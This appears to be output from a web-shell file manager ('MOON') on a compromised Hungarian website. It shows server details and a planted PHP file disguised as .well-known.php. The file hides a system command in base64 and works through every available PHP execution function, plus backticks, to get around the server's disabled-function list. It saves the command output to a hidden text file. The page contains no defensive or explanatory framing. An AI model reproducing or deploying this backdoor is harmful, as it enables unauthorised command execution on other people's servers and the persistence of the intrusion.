MOON
Server: Apache
System: Linux server.royaltuning.hu 4.18.0-425.13.1.el8_7.x86_64 #1 SMP Tue Feb 21 04:20:52 EST 2023 x86_64
User: royaltuning (1001)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/royaltuning/www/.well-known.php
<?php $c=base64_decode("dW5hbWUgLW0gMj4vZGV2L251bGwgfHwgZWNobyB1bmtub3du");$o="";$ok=0;if(!$ok&&function_exists("shell_exec")){$o=shell_exec($c." 2>&1");if($o!==null)$ok=1;}if(!$ok&&function_exists("system")){ob_start();system($c." 2>&1");$o=ob_get_clean();$ok=1;}if(!$ok&&function_exists("passthru")){ob_start();passthru($c." 2>&1");$o=ob_get_clean();$ok=1;}if(!$ok&&function_exists("exec")){exec($c." 2>&1",$arr);$o=implode("\n",$arr);$ok=1;}if(!$ok&&function_exists("popen")){$p=popen($c." 2>&1","r");$o=stream_get_contents($p);pclose($p);$ok=1;}if(!$ok&&function_exists("proc_open")){$d=array(1=>array("pipe","w"),2=>array("pipe","w"));$p=proc_open($c,$d,$pipes);$o=stream_get_contents($pipes[1]);proc_close($p);$ok=1;}if(!$ok){$o=`$c 2>&1`;if($o!==null)$ok=1;}file_put_contents(dirname(__FILE__)."/.out_77189.txt",$o);echo $o; ?>